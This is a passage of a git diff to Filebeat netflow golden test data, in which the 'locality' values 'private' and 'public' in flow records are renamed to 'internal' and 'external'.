"internal", "packets": 3, "port": 48378 } @@ -865,7 +865,7 @@ "Fields": { "destination": { "ip": "192.168.230.216", - "locality": "private", + "locality": "internal", "port": 48378 }, "event": { @@ -881,7 +881,7 @@ }, "flow": { "id": "VdPCBSYnnS0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.230.216", @@ -929,7 +929,7 @@ "source": { "bytes": 206, "ip": "192.168.183.199", - "locality": "private", + "locality": "internal", "packets": 3, "port": 6667 } @@ -943,7 +943,7 @@ "Fields": { "destination": { "ip": "172.20.4.30", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -959,7 +959,7 @@ }, "flow": { "id": "asoP1PL3Pao", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.20.4.30", @@ -1007,7 +1007,7 @@ "source": { "bytes": 504, "ip": "10.10.8.34", - "locality": "private", + "locality": "internal", "packets": 6, "port": 0 } @@ -1021,7 +1021,7 @@ "Fields": { "destination": { "ip": "10.10.8.220", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1037,7 +1037,7 @@ }, "flow": { "id": "r6DcuKSlKG8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.10.8.220", @@ -1085,7 +1085,7 @@ "source": { "bytes": 3539, "ip": "172.20.5.191", - "locality": "private", + "locality": "internal", "packets": 58, "port": 42502 } @@ -1099,7 +1099,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1115,7 +1115,7 @@ }, "flow": { "id": "4AA5ETLDkm0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1163,7 +1163,7 @@ "source": { "bytes": 495, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 33332 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1193,7 +1193,7 @@ }, "flow": { "id": "4AA5ETLDkm0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1241,7 +1241,7 @@ "source": { "bytes": 330, "ip": "172.20.4.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 33332 } @@ -1255,7 +1255,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1271,7 +1271,7 @@ }, "flow": { "id": "BaTGW6h8V9s", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1319,7 +1319,7 @@ "source": { "bytes": 435, "ip": "172.30.0.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 53298 } @@ -1333,7 +1333,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1349,7 +1349,7 @@ }, "flow": { "id": "BaTGW6h8V9s", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1397,7 +1397,7 @@ "source": { "bytes": 290, "ip": "172.30.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53298 } @@ -1411,7 +1411,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1427,7 +1427,7 @@ }, "flow": { "id": "a0peNOTOYXA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1475,7 +1475,7 @@ "source": { "bytes": 495, "ip": "10.10.6.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 48172 } @@ -1489,7 +1489,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "a0peNOTOYXA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1553,7 +1553,7 @@ "source": { "bytes": 330, "ip": "10.10.6.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 48172 } @@ -1567,7 +1567,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1583,7 +1583,7 @@ }, "flow": { "id": "rX81_0wnl4c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1631,7 +1631,7 @@ "source": { "bytes": 495, "ip": "10.10.7.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 48935 } @@ -1645,7 +1645,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1661,7 +1661,7 @@ }, "flow": { "id": "rX81_0wnl4c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1709,7 +1709,7 @@ "source": { "bytes": 330, "ip": "10.10.7.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 48935 } @@ -1723,7 +1723,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1739,7 +1739,7 @@ }, "flow": { "id": "7EW3D8kjT4Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1787,7 +1787,7 @@ "source": { "bytes": 495, "ip": "10.10.8.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 51931 } @@ -1801,7 +1801,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1817,7 +1817,7 @@ }, "flow": { "id": "7EW3D8kjT4Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1865,7 +1865,7 @@ "source": { "bytes": 330, "ip": "10.10.8.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51931 } @@ -1879,7 +1879,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1895,7 +1895,7 @@ }, "flow": { "id": "JacJ1_FgpYg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -1943,7 +1943,7 @@ "source": { "bytes": 495, "ip": "10.20.0.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 43454 } @@ -1957,7 +1957,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -1973,7 +1973,7 @@ }, "flow": { "id": "JacJ1_FgpYg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2021,7 +2021,7 @@ "source": { "bytes": 330, "ip": "10.20.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 43454 } @@ -2035,7 +2035,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -2051,7 +2051,7 @@ }, "flow": { "id": "38frmBtEgfI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2099,7 +2099,7 @@ "source": { "bytes": 495, "ip": "10.10.10.1", - "locality": "private", + "locality": "internal", "packets": 3, "port": 52837 } @@ -2113,7 +2113,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 5678 }, "event": { @@ -2129,7 +2129,7 @@ }, "flow": { "id": "38frmBtEgfI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "255.255.255.255", @@ -2177,7 +2177,7 @@ "source": { "bytes": 330, "ip": "10.10.10.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 52837 } @@ -2205,7 +2205,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:401", @@ -2271,7 +2271,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:401", @@ -2337,7 +2337,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:501", @@ -2403,7 +2403,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:501", @@ -2469,7 +2469,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:601", @@ -2535,7 +2535,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:601", @@ -2601,7 +2601,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:701", @@ -2667,7 +2667,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:701", @@ -2733,7 +2733,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:801", @@ -2799,7 +2799,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:801", @@ -2865,7 +2865,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:901", @@ -2931,7 +2931,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:901", @@ -2997,7 +2997,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1001", @@ -3063,7 +3063,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1001", @@ -3129,7 +3129,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1101", @@ -3195,7 +3195,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1101", @@ -3261,7 +3261,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1201", @@ -3327,7 +3327,7 @@ }, "flow": { "id": "RlrAo_U1Y14", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "fe80::ff:fe00:1201", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json index ebfee37989bc..e27655fe1edb 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Netscaler-with-variable-length-fields.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -94,7 +94,7 @@ "source": { "bytes": 40, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 51053 } @@ -108,7 +108,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 51053 }, "event": { @@ -124,7 +124,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -183,7 +183,7 @@ "source": { "bytes": 1525, "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -197,7 +197,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -213,7 +213,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -284,7 +284,7 @@ "source": { "bytes": 1541, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51053 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json index 54a8240bcd50..f21438c20eef 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Nokia-BRAS.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.34", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "aVnWxMM8qxI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.34", @@ -63,7 +63,7 @@ }, "source": { "ip": "10.0.1.228", - "locality": "private", + "locality": "internal", "port": 5878 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json index 09b25e1256bf..4961f7d0a257 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-OpenBSD-pflow.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "_dzJqQAoWYk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -67,7 +67,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64020 } @@ -81,7 +81,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64020 }, "event": { @@ -97,7 +97,7 @@ }, "flow": { "id": "_dzJqQAoWYk", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -141,7 +141,7 @@ "source": { "bytes": 6634, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -155,7 +155,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -171,7 +171,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -215,7 +215,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64021 } @@ -229,7 +229,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64021 }, "event": { @@ -245,7 +245,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -289,7 +289,7 @@ "source": { "bytes": 10893, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -303,7 +303,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -319,7 +319,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -363,7 +363,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64021 } @@ -377,7 +377,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64021 }, "event": { @@ -393,7 +393,7 @@ }, "flow": { "id": "iSYE82PBcbQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -437,7 +437,7 @@ "source": { "bytes": 10893, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -451,7 +451,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -467,7 +467,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -511,7 +511,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64022 } @@ -525,7 +525,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64022 }, "event": { @@ -541,7 +541,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -585,7 +585,7 @@ "source": { "bytes": 6780, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -599,7 +599,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -615,7 +615,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -659,7 +659,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64022 } @@ -673,7 +673,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64022 }, "event": { @@ -689,7 +689,7 @@ }, "flow": { "id": "L_N7tNeOZwc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -733,7 +733,7 @@ "source": { "bytes": 6780, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -747,7 +747,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -763,7 +763,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -807,7 +807,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64023 } @@ -821,7 +821,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64023 }, "event": { @@ -837,7 +837,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -881,7 +881,7 @@ "source": { "bytes": 7319, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 9, "port": 80 } @@ -895,7 +895,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -911,7 +911,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -955,7 +955,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64023 } @@ -969,7 +969,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64023 }, "event": { @@ -985,7 +985,7 @@ }, "flow": { "id": "Dsp4RZAzcPQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1029,7 +1029,7 @@ "source": { "bytes": 7319, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 9, "port": 80 } @@ -1043,7 +1043,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1059,7 +1059,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1103,7 +1103,7 @@ "source": { "bytes": 333, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 6, "port": 64024 } @@ -1117,7 +1117,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64024 }, "event": { @@ -1133,7 +1133,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1177,7 +1177,7 @@ "source": { "bytes": 1833, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1191,7 +1191,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1207,7 +1207,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1251,7 +1251,7 @@ "source": { "bytes": 333, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 6, "port": 64024 } @@ -1265,7 +1265,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64024 }, "event": { @@ -1281,7 +1281,7 @@ }, "flow": { "id": "B9Jsqhany8Q", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1325,7 +1325,7 @@ "source": { "bytes": 1833, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1339,7 +1339,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1355,7 +1355,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1399,7 +1399,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64025 } @@ -1413,7 +1413,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64025 }, "event": { @@ -1429,7 +1429,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1473,7 +1473,7 @@ "source": { "bytes": 10550, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -1487,7 +1487,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1503,7 +1503,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1547,7 +1547,7 @@ "source": { "bytes": 453, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 9, "port": 64025 } @@ -1561,7 +1561,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64025 }, "event": { @@ -1577,7 +1577,7 @@ }, "flow": { "id": "O7k79Py4ef0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1621,7 +1621,7 @@ "source": { "bytes": 10550, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 11, "port": 80 } @@ -1635,7 +1635,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1651,7 +1651,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1695,7 +1695,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64026 } @@ -1709,7 +1709,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64026 }, "event": { @@ -1725,7 +1725,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1769,7 +1769,7 @@ "source": { "bytes": 6425, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } @@ -1783,7 +1783,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1799,7 +1799,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -1843,7 +1843,7 @@ "source": { "bytes": 373, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "packets": 7, "port": 64026 } @@ -1857,7 +1857,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 64026 }, "event": { @@ -1873,7 +1873,7 @@ }, "flow": { "id": "T1etbJ4WSI0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1917,7 +1917,7 @@ "source": { "bytes": 6425, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 8, "port": 80 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json index 47dcb8c30083..30acfdf29c56 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-Procera.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 47838 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "gEodlN50y4w", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -75,7 +75,7 @@ }, "source": { "ip": "181.214.87.71", - "locality": "public", + "locality": "external", "port": 53787 } }, @@ -88,7 +88,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 135 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "GYmhjYyvaAI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -156,7 +156,7 @@ }, "source": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 136 } }, @@ -169,7 +169,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 22252 }, "event": { @@ -185,7 +185,7 @@ }, "flow": { "id": "qSSNfC38l0c", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -237,7 +237,7 @@ }, "source": { "ip": "5.188.11.35", - "locality": "public", + "locality": "external", "port": 44155 } }, @@ -250,7 +250,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 8 }, "event": { @@ -266,7 +266,7 @@ }, "flow": { "id": "Tv1jmZy2vn4", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -318,7 +318,7 @@ }, "source": { "ip": "206.117.25.89", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -331,7 +331,7 @@ "Fields": { "destination": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 135 }, "event": { @@ -347,7 +347,7 @@ }, "flow": { "id": "GYmhjYyvaAI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -399,7 +399,7 @@ }, "source": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 136 } }, @@ -412,7 +412,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 7451 }, "event": { @@ -428,7 +428,7 @@ }, "flow": { "id": "JhEHWMX5XwI", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -480,7 +480,7 @@ }, "source": { "ip": "185.232.29.199", - "locality": "public", + "locality": "external", "port": 55869 } }, @@ -493,7 +493,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 2000 }, "event": { @@ -509,7 +509,7 @@ }, "flow": { "id": "Q_zyIhDZuIo", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -561,7 +561,7 @@ }, "source": { "ip": "177.188.228.137", - "locality": "public", + "locality": "external", "port": 9430 } }, @@ -574,7 +574,7 @@ "Fields": { "destination": { "ip": "138.44.161.13", - "locality": "public", + "locality": "external", "port": 179 }, "event": { @@ -590,7 +590,7 @@ }, "flow": { "id": "pNMKY7O9aVc", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -642,7 +642,7 @@ }, "source": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 33689 } }, diff --git 